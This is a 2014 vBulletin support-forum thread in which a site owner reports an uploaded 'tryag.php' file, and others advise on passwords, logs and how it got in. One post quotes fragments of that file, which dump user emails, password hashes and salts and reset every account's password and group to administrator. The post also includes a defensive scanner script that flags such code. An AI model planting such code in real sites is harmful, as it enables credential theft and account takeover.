Hacked by "Tryag"
Jaggee
05-07-2014, 04:06 PM
http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.
ForceHSS
05-07-2014, 04:31 PM
It was uploaded from the FTP. Change FTP, cPanel, and forum admin passwords. Check all files in the FTP, then once you have removed all they uploaded, upload a fresh copy yourself. Also check if they logged into the admin panel; if so, check logs.
Lynne
05-07-2014, 05:12 PM
Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.
helmer.co
05-08-2014, 09:17 AM
What was the file name and directory? Also, what version of VB4 are you running?
ForceHSS
05-08-2014, 09:58 AM
http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.
If you check that coding, it's nasty. This is what I mean:
<td class="style5"><?echo $r[userid]?></td>
<td class="style5"><?echo $r[username]?></td>
<td class="style5"><?echo $r[email]?></td>
<td class="style5"><?echo $r[password]?></td>
<td class="style5"><?echo $r[salt]?></td>
And
$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt=' oky',usergroupid='6'");
But there are even worse parts in the code to worry about in there.
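A sketch of the file check recommended earlier in the thread, as an added example that is not part of the original posts: it walks a web root and flags PHP files showing the two behaviours quoted above (printing password/salt columns, and an UPDATE on the user table that sets credentials). The function names, patterns and sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Patterns modelled on the two fragments quoted in the post above.
UPDATE_USER = re.compile(r"UPDATE\s+`?\w*user`?\s+SET\b([^;]*)", re.I)
CRED_COLS = re.compile(r"\b(password|salt|usergroupid)\s*=", re.I)
ECHO_SECRET = re.compile(
    r"echo\s*\(?\s*\$\w+\[\s*['\"]?(password|salt)['\"]?\s*\]", re.I)


def scan_webroot(root):
    """Return {relative_path: [finding, ...]} for PHP files under root."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(errors="replace")
        hits = []
        for m in UPDATE_USER.finditer(text):
            clause = m.group(1)  # everything from SET up to the next ';'
            if CRED_COLS.search(clause):
                has_where = re.search(r"\bWHERE\b", clause, re.I)
                scope = "with WHERE" if has_where else "no WHERE (all rows)"
                hits.append(f"credential UPDATE on user table, {scope}")
        if ECHO_SECRET.search(text):
            hits.append("echoes password/salt column")
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings


def demo():
    """Scan a constructed web root (sample files, not the real paste)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "tryag.php").write_text(
            '<td class="style5"><?echo $r[salt]?></td>\n'
            '$okey=mysql_query("UPDATE user SET password=\'HASH\','
            'salt=\'x\',usergroupid=\'6\'");\n')
        (root / "profile.php").write_text(
            '<?php $db->query("UPDATE user SET email=\'a@b.c\' '
            'WHERE userid=5"); echo $r[username];\n')
        return scan_webroot(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", "; ".join(hits))
```

A hit is a lead for manual review, not a verdict; comparing flagged files against a fresh copy of the forum software separates stock code from uploads.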
Jaggee
05-08-2014, 01:13 PM
What was the file name and directory? Also, what version of VB4 are you running?
Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"
Didn't find out how it was uploaded, by logs.
Lynne
05-08-2014, 05:14 PM
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.
Jaggee
05-08-2014, 06:29 PM
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.
When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The shell logs (messages & secure) only show commands, not what happens inside the software, and sftp-server never showed any logs.
Lionel
05-09-2014, 12:07 AM
My admincp of one of my sites once got hacked. They created a plugin that could be run via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewalling SSH and FTP. What was strange, but I never complained, was that the password I was using was unique and specific to only two sites: here and that site. Lucky for me, I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.
helmer.co
05-09-2014, 12:20 AM
Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"
Didn't find out how it was uploaded, by logs.
When you say the latest version, you mean 4.22 PL1 with the install directory deleted, correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?
Did you use them at any other sites?
Jaggee
05-09-2014, 10:44 AM
When you say the latest version, you mean 4.22 PL1 with the install directory deleted, correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?
Did you use them at any other sites?
4.22 PL1, yes. I always remove install directory directly after the installation. It's nearly impossible to hack my root account.
My password is similar to: Lf32KlDo2A0Sdl2lss0SlcSAoisS0221
So no, didn't.